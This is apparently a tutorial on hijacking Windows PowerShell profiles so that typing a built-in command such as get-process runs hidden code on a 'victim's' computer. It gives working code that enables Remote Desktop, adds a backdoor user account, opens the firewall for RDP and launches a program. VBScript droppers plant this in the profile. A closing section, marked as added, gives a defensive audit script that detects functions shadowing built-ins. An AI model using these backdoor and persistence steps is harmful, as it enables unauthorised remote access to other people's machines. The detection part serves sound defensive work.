Introduction
Perhaps you have seen it in action movies: when a hacker's victim types a specific command, his computer explodes. We can't blow someone's computer up remotely, but we can change what a command does after it is typed by a user. This is done by using Windows PowerShell profiles.
What is the Windows PowerShell profile?
When you add aliases, functions, and variables, you are actually adding them only to the current Windows PowerShell session. If you exit the session or close Windows PowerShell, the changes are lost. To retain these changes, you can create a Windows PowerShell profile and add the aliases, functions, and variables to the profile. The profile is loaded every time Windows PowerShell starts.

You can have four different profiles in Windows PowerShell. The profiles are listed in load order. The most specific profiles have precedence over less specific profiles where they apply.

• %windir%\system32\WindowsPowerShell\v1.0\profile.ps1 : This profile applies to all users and all shells.
• %windir%\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 : This profile applies to all users, but only to the Microsoft.PowerShell shell.
• %UserProfile%\My Documents\WindowsPowerShell\profile.ps1 : This profile applies only to the current user, but affects all shells.
• %UserProfile%\My Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 : This profile applies only to the current user and the Microsoft.PowerShell shell.

Windows PowerShell profiles are not created automatically. To create a profile, create a text file with the specified name in the specified location. Typically, you will use the user-specific, shell-specific profile, known as the Windows PowerShell user profile. The location of this profile is stored in the $profile variable.

To display the path to the Windows PowerShell profile, type:
• $profile
To determine whether a Windows PowerShell profile has been created on the system, type:
• test-path $profile
If the profile exists, the response is True; otherwise, it is False.
To create a Windows PowerShell profile file, type:
• new-item -path $profile -itemtype file -force
To open the profile in Notepad, type:
• notepad $profile
To create one of the other profiles, such as the profile that applies to all users and all shells, type:
• new-item -path $env:windir\System32\WindowsPowerShell\v1.0\profile.ps1 -itemtype file -force

The profile is effective only when the file is located exactly in the path and with the file name that is stored in the $profile variable. Therefore, if you create a profile in Notepad and then save it, or if you copy a profile to your system, be sure to save the file in the path and with the file name specified in the $profile variable. If you create a profile in Notepad, enclose the file name in quotation marks to preserve the PS1 file name extension. For example:
• "Microsoft.PowerShell_profile.ps1"
Without the quotation marks, Notepad appends the .txt file name extension to the file, and Windows PowerShell will not recognize it.

Changing what a command does

Now we want the following to happen after the user executes the get-process command, instead of the command simply running:
1 – Enable Remote Desktop Protocol
2 – Create a new user account
3 – Allow incoming RDP on the firewall
4 – Enable secure RDP authentication
5 – Run the calc.exe program
6 – Clear the screen
7 – Show the full process list

In the first step you must open $profile in Notepad (notepad $profile) and type the commands into it. You can select any of the Windows PowerShell profiles for this job; in this example I select Microsoft.PowerShell_profile.ps1 in the C:\Users\Micr0s0ft\Documents\WindowsPowerShell location.
The overall structure of the function is as follows:
————————–
function command-name {
    (command1)
    (command2)
    . . .
    (command n)
}
————————–
So for get-process we write:
function get-process {
    (Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0)
    (net user moslem iran /add)
    (Enable-NetFirewallRule -DisplayGroup "Remote Desktop")
    (Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1)
    (Invoke-Item C:\Windows\System32\calc.exe)
    (clear)
    # A bare get-process here would resolve to this function again (functions shadow cmdlets)
    # and recurse until the call depth limit, so the real cmdlet is called by its module-qualified name
    (Microsoft.PowerShell.Management\Get-Process)
}
If the victim instead types get-service, calc.exe (or malware.exe) is executed first, before the list of services is displayed:

function get-service {
    (Invoke-Item C:\Windows\System32\calc.exe)
    (clear)
    # module-qualified name, so the function does not call itself
    (Microsoft.PowerShell.Management\Get-Service)
}
Now, if the get-process or get-service command is typed by the victim, the code above starts running. Assuming that you are back on the system with only a little time, or have remote access to the computer but are not able to follow the steps above by hand, these steps can be done by executing a VBS file. In the first step I create a text file named Microsoft.PowerShell_profile.txt in the C:\Users\Micr0s0ft\Documents\WindowsPowerShell location, append all the needed command lines to it, and finally change the file type to .ps1 (PowerShell script file). The file content is the get-service function:

function get-service {
    (Invoke-Item C:\Windows\System32\calc.exe)
    (clear)
    (Microsoft.PowerShell.Management\Get-Service)
}
' create a text file
Dim filesys, demofolder, filetxt
Set filesys = CreateObject("Scripting.FileSystemObject")
Set demofolder = filesys.GetFolder("C:\Users\Micr0s0ft\Documents\WindowsPowerShell")
Set filetxt = demofolder.CreateTextFile("Microsoft.PowerShell_profile.txt", True)
filetxt.WriteLine("function CommandName {")   ' start of the function; CommandName is the command being overridden
' command lines to execute, one WriteLine per line of the profile
filetxt.WriteLine("command 1")                ' for example: filetxt.WriteLine("(net user moslem iran /add)") to create a user account
filetxt.WriteLine("command 2")
' ...
filetxt.WriteLine("command n")
filetxt.WriteLine("}")                        ' end of the function
filetxt.Close                                 ' close the text file and save it
' change the file type from .txt to .ps1 using FSO in VBScript (full paths, so it does not depend on the current directory)
Dim Fso
Set Fso = WScript.CreateObject("Scripting.FileSystemObject")
Fso.MoveFile "C:\Users\Micr0s0ft\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.txt", "C:\Users\Micr0s0ft\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1"
Now you can save this file and run it on the victim's computer. It is better to append to the Windows PowerShell profile file and add the script to it rather than overwrite it. To append to the text file you can use this code:
' path of the profile text file (no leading space in the file name, or the profile will never be found)
strFile = "C:\Users\Micr0s0ft\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.txt"
Const ForAppending = 8
Set objFSO = CreateObject("Scripting.FileSystemObject")
' open for appending; the third argument creates the file if it does not exist yet
Set objFile = objFSO.OpenTextFile(strFile, ForAppending, True)
objFile.WriteLine("function get-service {")
objFile.WriteLine("(Invoke-Item C:\Windows\System32\calc.exe)")
objFile.WriteLine("(Microsoft.PowerShell.Management\Get-Service)")
objFile.WriteLine("}")
objFile.Close
' rename .txt to .ps1; MoveFile raises an error if the .ps1 already exists
Dim Fso
Set Fso = WScript.CreateObject("Scripting.FileSystemObject")
Fso.MoveFile "C:\Users\Micr0s0ft\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.txt", "C:\Users\Micr0s0ft\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1"
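The flip side of the technique above is checking for it. The following audit script is an added example, not code from the original post: it walks the four profile locations described earlier, records whether each exists together with its last-write time and SHA-256, then parses each file without executing it and reports every function whose name matches a built-in cmdlet or alias (such as the get-process and get-service overrides shown above). It assumes Windows PowerShell 5.1 (Get-FileHash, the note properties on $PROFILE and the Parser class all exist there); the file name Audit-Profiles.ps1 is a hypothetical one.

```powershell
# Added example (not from the original post): audit Windows PowerShell profiles for
# functions that shadow built-in commands.
# Run it from a session that has NOT loaded any profile, so that a hijacked profile
# cannot redefine Get-Command or Get-FileHash out from under the audit:
#   powershell.exe -NoProfile -ExecutionPolicy Bypass -File Audit-Profiles.ps1
# Assumes Windows PowerShell 5.1. Audit-Profiles.ps1 is a hypothetical file name.

$profilePaths = @(
    $PROFILE.AllUsersAllHosts,       # %windir%\System32\WindowsPowerShell\v1.0\profile.ps1
    $PROFILE.AllUsersCurrentHost,    # %windir%\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
    $PROFILE.CurrentUserAllHosts,    # <Documents>\WindowsPowerShell\profile.ps1
    $PROFILE.CurrentUserCurrentHost  # <Documents>\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
)

foreach ($path in $profilePaths) {
    if (-not (Test-Path -LiteralPath $path)) {
        Write-Output "[absent ] $path"
        continue
    }

    $item   = Get-Item -LiteralPath $path
    $sha256 = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
    Write-Output "[present] $path"
    Write-Output "          last write $($item.LastWriteTime), SHA256 $sha256"

    # Parse the profile into an AST without running it and collect every function definition.
    $tokens = $null
    $parseErrors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseFile($path, [ref]$tokens, [ref]$parseErrors)
    $functionAsts = $ast.FindAll(
        { param($node) $node -is [System.Management.Automation.Language.FunctionDefinitionAst] },
        $true)

    foreach ($fn in $functionAsts) {
        # Command resolution prefers functions over cmdlets and aliases, so a profile
        # function named like a built-in replaces it for the whole session.
        $builtin = Get-Command -Name $fn.Name -CommandType Cmdlet, Alias -ErrorAction SilentlyContinue |
                   Select-Object -First 1
        if ($builtin) {
            $msg = "function '$($fn.Name)' at line $($fn.Extent.StartLineNumber) shadows built-in $($builtin.CommandType) '$($builtin.Name)'"
            Write-Warning $msg
        }
        else {
            Write-Output "          function '$($fn.Name)' defined (no built-in of that name)"
        }
    }
}
```

Two related checks are worth knowing inside an already-running session: Get-Command Get-Process -All lists every command registered under that name, so a Function entry sitting above the Cmdlet entry is the override; and calling the cmdlet by its module-qualified name, Microsoft.PowerShell.Management\Get-Process, bypasses a same-named function entirely. Baselining the SHA-256 of each profile (or of its absence) and alerting on change is the simplest durable control, since the profile paths are fixed and normally change rarely.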